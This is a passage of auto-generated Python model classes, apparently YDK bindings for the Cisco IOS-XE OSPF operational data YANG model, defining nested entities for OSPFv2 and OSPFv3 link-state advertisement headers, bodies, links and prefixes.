("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal))]) self._leafs = OrderedDict() self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal() self.lsa_nssa_external.parent = self self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external" self._segment_path = lambda: "nssa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa, [], name, value) class LsaNssaExternal(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, self).__init__() self.yang_name = "lsa-nssa-external" self.yang_parent_name = "nssa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None self.external_prefix_options = None self.forwarding_address = None self.external_route_tag = None self.referenced_link_state_id = None self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: "lsa-nssa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__() self.yang_name = "flags" self.yang_parent_name = "lsa-nssa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value) class LinkData(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData, self).__init__() self.yang_name = "link-data" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])), ('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])), ('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])), ]) self.rtr_priority = None self.link_local_interface_address = None self.num_of_prefixes = None self.lsa_id_options = Bits() self._segment_path = lambda: "link-data" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value) class IaPrefix(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix, self).__init__() self.yang_name = "ia-prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])), ]) self.referenced_ls_type = None self.referenced_link_state_id = None self.referenced_adv_router = None self.num_of_prefixes = None self._segment_path = lambda: "ia-prefix" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value) class Ospfv3Link(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Link, self).__init__() self.yang_name = "ospfv3-link" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])), ('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])), ('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])), ('type', (YLeaf(YType.uint8, 'type'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.interface_id = None self.neighbor_interface_id = None self.neighbor_router_id = None self.type = None self.metric = None self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value) class Ospfv3Prefix(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Prefix, self).__init__() self.yang_name = "ospfv3-prefix" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])), ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])), ]) self.prefix = None self.prefix_options = None self._segment_path = lambda: "ospfv3-prefix" + "[prefix='" + str(self.prefix) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Prefix, ['prefix', 'prefix_options'], name, value) class Ospfv3IaPrefix(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix, self).__init__() self.yang_name = "ospfv3-ia-prefix" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])), ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])), ]) self.prefix = None self.prefix_options = None self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value) class IntfMultiTopology(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfMultiTopology, self).__init__() self.yang_name = "intf-multi-topology" self.yang_parent_name = "ospf-interface" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['name'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('name', (YLeaf(YType.str, 'name'), ['str'])), ]) self.name = None self._segment_path = lambda: "intf-multi-topology" + "[name='" + str(self.name) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfMultiTopology, ['name'], name, value) class AreaScopeLsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa, self).__init__() self.yang_name = "area-scope-lsa" self.yang_parent_name = "ospf-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['lsa_type'] self._child_classes = OrderedDict([("area-scope-lsa", ("area_scope_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_))]) self._leafs = OrderedDict([ ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])), ]) self.lsa_type = None self.area_scope_lsa = YList(self) self._segment_path = lambda: "area-scope-lsa" + "[lsa-type='" + str(self.lsa_type) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa, ['lsa_type'], name, value) class AreaScopeLsa_(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_, self).__init__() self.yang_name = "area-scope-lsa" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['lsa_type','adv_router'] self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2External)), ("ospfv3-lsa", ("ospfv3_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Link)), ("ospfv3-prefix", ("ospfv3_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Prefix)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3IaPrefix))]) self._leafs = OrderedDict([ ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])), ('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])), ('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])), ('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])), ]) self.lsa_type = None self.adv_router = None self.decoded_completed = None self.raw_data = [] self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa() self.ospfv2_lsa.parent = self self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa" self.ospfv3_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa() self.ospfv3_lsa.parent = self self._children_name_map["ospfv3_lsa"] = "ospfv3-lsa" self.ospfv2_link = YList(self) self.ospfv2_topology = YList(self) self.ospfv2_external = YList(self) self.ospfv3_link = YList(self) self.ospfv3_prefix = YList(self) self.ospfv3_ia_prefix = YList(self) self._segment_path = lambda: "area-scope-lsa" + "[lsa-type='" + str(self.lsa_type) + "']" + "[adv-router='" + str(self.adv_router) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_, ['lsa_type', 'adv_router', 'decoded_completed', 'raw_data'], name, value) class Ospfv2Lsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa, self).__init__() self.yang_name = "ospfv2-lsa" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header() self.header.parent = self self._children_name_map["header"] = "header" self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = "lsa-body" self._segment_path = lambda: "ospfv2-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa, [], name, value) class Header(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])), ('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])), ('age', (YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])), ]) self.lsa_id = None self.opaque_type = None self.opaque_id = None self.age = None self.type = None self.adv_router = None self.seq_num = None self.checksum = None self.length = None self.flag_options = Bits() self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value) class LsaBody(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody, self).__init__() self.yang_name = "lsa-body" self.yang_parent_name = "ospfv2-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network))]) self._leafs = OrderedDict([ ('num_of_links', (YLeaf(YType.uint16, 'num-of-links'), ['int'])), ('summary_mask', (YLeaf(YType.str, 'summary-mask'), ['str','str'])), ('external_mask', (YLeaf(YType.str, 'external-mask'), ['str','str'])), ('body_flag_options', (YLeaf(YType.bits, 'body-flag-options'), ['Bits'])), ]) self.num_of_links = None self.summary_mask = None self.external_mask = None self.body_flag_options = Bits() self.network = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network() self.network.parent = self self._children_name_map["network"] = "network" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody, ['num_of_links', 'summary_mask', 'external_mask', 'body_flag_options'], name, value) class Network(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network, self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('network_mask', (YLeaf(YType.str, 'network-mask'), ['str','str'])), ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ]) self.network_mask = None self.attached_router = [] self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, value) class Ospfv2Link(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link, self).__init__() self.yang_name = "ospfv2-link" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['link_id','link_data'] self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link.Ospfv2Topology))]) self._leafs = OrderedDict([ ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])), ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])), ('type', (YLeaf(YType.uint8, 'type'), ['int'])), ]) self.link_id = None self.link_data = None self.type = None self.ospfv2_topology = YList(self) self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value) class Ospfv2Topology(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link.Ospfv2Topology, self).__init__() self.yang_name = "ospfv2-topology" self.yang_parent_name = "ospfv2-link" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.mt_id = None self.metric = None self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value) class Ospfv2Topology(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Topology, self).__init__() self.yang_name = "ospfv2-topology" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.mt_id = None self.metric = None self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2Topology, ['mt_id', 'metric'], name, value) class Ospfv2External(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2External, self).__init__() self.yang_name = "ospfv2-external" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['mt_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])), ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ]) self.mt_id = None self.metric = None self.forwarding_address = None self.external_route_tag = None self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value) class Ospfv3Lsa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa, self).__init__() self.yang_name = "ospfv3-lsa" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody))]) self._leafs = OrderedDict() self.header = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header() self.header.parent = self self._children_name_map["header"] = "header" self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody() self.lsa_body.parent = self self._children_name_map["lsa_body"] = "lsa-body" self._segment_path = lambda: "ospfv3-lsa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa, [], name, value) class Header(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header, self).__init__() self.yang_name = "header" self.yang_parent_name = "ospfv3-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader))]) self._leafs = OrderedDict([ ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])), ('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])), ]) self.lsa_id = None self.lsa_hdr_options = Bits() self.lsa_header = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader() self.lsa_header.parent = self self._children_name_map["lsa_header"] = "lsa-header" self._segment_path = lambda: "header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header, ['lsa_id', 'lsa_hdr_options'], name, value) class LsaHeader(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader, self).__init__() self.yang_name = "lsa-header" self.yang_parent_name = "header" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('age', (YLeaf(YType.uint16, 'age'), ['int'])), ('type', (YLeaf(YType.uint16, 'type'), ['int'])), ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])), ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])), ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])), ('length', (YLeaf(YType.uint16, 'length'), ['int'])), ]) self.age = None self.type = None self.adv_router = None self.seq_num = None self.checksum = None self.length = None self._segment_path = lambda: "lsa-header" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value) class LsaBody(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody, self).__init__() self.yang_name = "lsa-body" self.yang_parent_name = "ospfv3-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.IaPrefix))]) self._leafs = OrderedDict([ ('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])), ('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])), ]) self.lsa_flag_options = Bits() self.lsa_body_flags = Bits() self.network = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Network() self.network.parent = self self._children_name_map["network"] = "network" self.prefix = OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa.AreaScopeLsa_.Ospfv3Lsa.LsaBody.Prefix() self.prefix.parent = self self._children_name_map["prefix"] = "prefix" self.ia_router = 